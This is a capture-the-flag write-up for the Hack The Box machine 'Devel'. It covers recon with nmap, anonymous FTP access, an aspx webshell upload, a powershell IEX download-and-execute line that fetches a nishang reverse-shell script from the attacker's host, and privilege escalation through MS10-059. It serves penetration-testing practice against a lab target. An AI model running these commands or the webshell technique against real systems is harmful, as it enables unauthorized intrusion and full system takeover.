Contents

🕵 HTB-Writeup : DEVEL

Recon

nmap

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 03-17-17  05:37PM                  689 iisstart.htm
|_03-17-17  05:37PM               184946 welcome.png
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Windows machine with Microsoft IIS webserver v7.5.

Dirbuster

Dirbuster scan don’t find any directories or files.

Tested extensions:

  • php
  • txt
  • xml
  • sh
  • asp
  • html

ftp server

As the ftp-anon script from nmap show, we can connect into the ftp server with the anonymous user.

1
2
3
4
5
6
7
8
└─$ ftp anonymous@10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> 

But we can’t find any interesting files.

Since we can’t find any directories or files, I manage to try to find vulnerabilities on the FTP server.

Firstly I download all files I can from anonymous connection. No interesting files.

1
2
3
4
5
6
7
8
9
└─$ wget -m --no-passive ftp://anonymous:anonymous@10.10.10.5

└─$ tree 10.10.10.5 
10.10.10.5
├── aspnet_client
│   └── system_web
│       └── 2_0_50727
├── iisstart.htm
└── welcome.png

I try to bruteforce accounts from nmap nse scripts. No results.

1
2
3
4
5
└─$ nmap --script ftp-* -p 21 10.10.10.5

| ftp-brute: 
|   Accounts: No valid accounts found
|_  Statistics: Performed 50009 guesses in 317 seconds, average tps: 145.0

Re-checking downloaded files, I realize that I have missed an important information. The IIS webserver use this FTP server. When trying to navigate to http://10.10.10.5/aspnet_client/ we get an access denied, so the FTP server is using a IIS server.

Vulnerabilities

Knowing that, we can try to upload file to get a reverse shell.

I upload an aspx webshell on the ftp to try to execute powershell commands. The webshell can be found at /usr/share/webshells/aspx/cmdasp.aspx on a Kali Linux.

Then, I prepare the nishang reverse powershell script that can be found at this link.

Adding the following line to the bottom of the script with our IP and port.

1
Invoke-PowerShellTcp.ps1 -Reverse -IPAddress <MyIP> -Port <MyPORT>`

Then, I up a python http server with our powershell script. On the webshell, we download and execute our script

1
2
# on aspx command prompt
powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://<MyIP>:<MyPORT>/Invoke-PowerShellTcp.ps1')"
drawing

Command injection on the form

drawing

Response on our host

It works! We get a reverse shell!

1
2
3
4
5
6
7
8
9
Windows PowerShell running as user DEVEL$ on DEVEL
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\windows\system32\inetsrv>

    Directory: C:\windows\system32\inetsrv

PS C:\windows\system32\inetsrv> whoami
iis apppool\web

We can get the user flag. Let’s go to the privesc!

privesc

I first get the content of systeminfo and pass it into the Windows-Exploit-Suggester tool.

1
2
3
4
5
6
7
8
9
└─$ python2 ../TOOLS/Windows-Exploit-Suggester/windows-exploit-suggester.py -d 2022-08-21-mssb.xls -i sysinfo -l

[*] initiating winsploit version 3.3...
[*] comparing the 0 hotfix(es) against the 179 potential bulletins(s) with a database of 137 known exploits
[*] searching for local exploits only
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[*] done

It gaves me 3 potentials vulnerabilities. I found this github that list multiple Windows exploit, I try the third one listed by our tool (MS10-059).

The MS10-059 vulnerability allow an attacker to run code with elevated privileges. It exploit incorrect access control lists (ACLs) on the registry keys for the Tracing Feature for Services.

I download the program on the machine with a smb share, then I executed it.

drawing

Commands executed on the target

We get another reverse shell ! This time with system privileges!

drawing

Reverse shell gain on the host

Tags

Easy, External, Network, IIS, ASP, Penetration Tester Level 2, Remote Code Execution, Unrestricted File Upload